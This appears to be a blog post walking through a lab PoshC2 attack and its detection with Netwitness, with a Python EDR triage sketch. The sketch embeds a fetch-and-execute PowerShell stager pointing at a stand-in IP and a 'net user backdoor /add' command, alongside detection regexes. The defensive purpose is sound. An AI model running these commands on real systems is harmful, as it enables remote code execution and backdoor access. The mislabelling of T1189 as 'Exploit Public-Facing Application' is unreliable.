Introduction:
PoshC2, a powerful post-exploitation framework, has become a popular tool for adversaries to maintain persistence and execute various malicious activities within compromised networks. This blog post will delve into a simulated PoshC2 attack that traverses multiple MITRE ATT&CK tactics, from payload creation to establishing persistence. We will then explore how a Security Operations Center (SOC) analyst can effectively detect and mitigate such threats using Netwitness, leveraging its advanced capabilities in log analysis, Endpoint Detection and Response (EDR), and Network Detection and Response (NDR).
Attack Scenario:
This blog post will examine a real-world scenario where a Security Operations Center (SOC) was alerted to suspicious encrypted traffic originating from an agent host and an unknown malicious IP address. Upon further investigation, it became evident that the host had already been compromised by a Command and Control (C2) attack. We will explore how Netwitness, with its advanced log analysis, Endpoint Detection and Response (EDR), and Network Detection and Response (NDR) capabilities, played a crucial role in detecting and mitigating this threat.
Red Team Tools:
Blue Team Tools:
Link for resources:
Additional Considerations:
It is important to emphasize that this blog post is intended for educational purposes only. Any actions described in this post should not be attempted on unauthorized systems. Always adhere to ethical and legal guidelines when conducting security investigations.
The Attack:
Red Team Activity:
Resource Development
T1588.002: Obtain Capabilities: Tool
In this phase of the PoshC2 attack, the adversary focuses on acquiring the necessary tools and resources to establish and maintain persistence within the compromised environment. This aligns with the MITRE ATT&CK technique T1588.002.
A custom payload was crafted to connect to the attacker's machine via an encrypted HTTPS channel. PoshC2 offers a versatile range of payload options, including batch files, HTA files, and raw PowerShell commands, allowing attackers to select the most suitable delivery method based on the target environment and desired level of stealth.
For this lab, we utilized a batch file payload (payload.bat) as a representative example. The batch file contains the necessary instructions to establish the initial connection with the attacker's command and control server and execute subsequent malicious actions.
Delivery
T1189: Exploit Public-Facing Application: Web Server
The next phase of the attack involves delivering the malicious payload to the target system. This aligns with the MITRE ATT&CK technique T1189.
A straightforward delivery method was employed in this scenario. A web server was configured to host the payloads created in the previous step, making them accessible to potential victims. The attacker would then wait for unsuspecting users to visit the malicious website and download the infected file. This technique leverages the widespread use of web servers and the trust that users often place in online content to trick victims into executing malicious code.
The batch file immediately launches a PowerShell script that establishes communication with the attacker's machine. The PowerShell command line is base64-encoded to obfuscate the malicious activity and evade detection by security systems (base64 is an encoding, not encryption; the confidentiality of the channel comes from the HTTPS transport described above). The PowerShell script acts as a bridge between the compromised victim machine and the attacker's command and control server, enabling the adversary to remotely execute commands and maintain persistence.
Persistence
T1136.001: Create Accounts
To maintain long-term access to the compromised system, the attacker establishes persistence. This aligns with the MITRE ATT&CK technique T1136.001.
A local account named "backdoor" is created on the infected host. This account provides the attacker with a privileged backdoor into the system, allowing them to bypass authentication mechanisms and execute malicious commands even after the initial infection vector has been removed. The persistence mechanism ensures that the attacker can regain control of the compromised system at any time, making it difficult to eradicate the threat.
Detection:
NDR
Analyzing the NDR data lets us inspect the web traffic and learn more about where payload.bat came from.
EDR
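As an added example (not from the original post, the PoshC2 project or Netwitness), the following Python sketch shows the EDR-side triage logic an analyst applies at this point: it walks constructed process-creation events, decodes a base64 `-EncodedCommand` spawned by the batch file, and flags the `net user /add` that creates the "backdoor" account. The IP address, paths, field names and stager string are assumptions.

```python
import base64
import re

# Constructed stand-in for the stager the batch file launches (not PoshC2's real stager).
STAGER_PS = "IEX (New-Object Net.WebClient).DownloadString('https://203.0.113.5/stage')"
# PowerShell's -EncodedCommand expects base64 of the UTF-16LE script bytes.
ENCODED = base64.b64encode(STAGER_PS.encode("utf-16le")).decode()

# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\Downloads\payload.bat"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"powershell.exe -nop -w hidden -e {ENCODED}"},
    {"image": r"C:\Windows\System32\net.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "net user backdoor P@ssw0rd! /add"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe Get-Process"},
]

# Accepts the common abbreviations of -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(ev):
    """Return the list of findings for one process-creation event."""
    findings = []
    cmd, image = ev["cmdline"], ev["image"].lower()
    if image.endswith("powershell.exe") and ev["parent"].lower().endswith("cmd.exe"):
        findings.append("powershell spawned by cmd.exe (batch-file launcher pattern)")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append(f"encoded PowerShell decodes to: {decoded}")
        if re.search(r"downloadstring|iex|invoke-expression", decoded, re.I):
            findings.append("decoded script downloads and executes remote content")
    if image.endswith("net.exe") and re.search(r"\buser\b.*\s/add\b", cmd, re.I):
        findings.append("local account creation via net user /add (T1136.001)")
    return findings

def triage(events):
    """Flatten findings across events into (command line, finding) pairs for review."""
    return [(ev["cmdline"][:40], f) for ev in events for f in analyze_event(ev)]
```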
Attack timeline:
Conclusion:
This case study demonstrates the effectiveness of utilizing multiple data sources for comprehensive threat investigation and confirmation. By combining log analysis, EDR, and NDR capabilities within Netwitness, security teams can gain a deeper understanding of malicious activities and respond more effectively to incidents like PoshC2 attacks.